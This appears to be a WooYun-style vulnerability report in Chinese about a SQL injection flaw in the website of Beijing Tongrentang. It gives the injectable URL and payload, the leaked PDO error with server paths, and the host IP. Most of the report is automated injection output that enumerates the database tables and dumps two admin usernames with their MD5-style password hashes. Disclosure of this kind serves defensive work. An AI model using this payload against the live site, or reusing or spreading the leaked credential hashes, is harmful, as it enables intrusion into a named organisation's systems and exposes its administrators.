中国北京同仁堂（集团）官网存在sql注入漏洞。。好歹也市值:191.53亿元。。
详细说明：
http://www.tongrentang.com/trtxsqy/introduce_yc.php?id='%60%228rk1B
 
Error: exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'`\"1' at line 1' in /data/web/trt/admin/db.php:36 Stack trace: #0 /data/web/trt/admin/db.php(36): PDO->query('select * from a...') #1 /data/web/trt/trtxsqy/introduce_yc.php(5): db->query('select * from a...') #2 {main}
 
 
Analyzing http://www.tongrentang.com/trtxsqy/introduce_yc.php?id='%60%228rk1B
Host IP: 211.99.194.203
Web Server: nginx
Keyword Found: Error:
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 12
Valid String Column is 2
Current DB: trt
Count(table_name) of information_schema.tables where table_schema=0x747274 is 12
Tables found: admin,advt_swf,article,dianmian,dianmian_en,lib,positioninfotable,product,product_en,tag,user,videocategory
Count(table_name) of information_schema.tables where table_schema=0x747274 is 12
Tables found: admin,advt_swf,article,dianmian,dianmian_en,lib,positioninfotable,product,product_en,tag,user,videocategory
Count(table_name) of information_schema.tables where table_schema=0x747274 is 12
Tables found: admin,advt_swf,article,dianmian,dianmian_en,lib,positioninfotable,product,product_en,tag,user,videocategory
Count(column_name) of information_schema.columns where table_schema=0x747274 and table_name=0x61646D696E is 5
Columns found: id,username,password,rights,regtime
Count(*) of trt.admin is 2
Data Found: id=1
Data Found: password=98245d354279aa2faec79779601dd675
Data Found: username=super
Data Found: id=2
Data Found: password=e1f1b43c56ea0e9cd9bcd5b2c2981e1e
Data Found: username=yaodian
 
 
 
 
修复方案：
过滤

作者 zeracker@乌云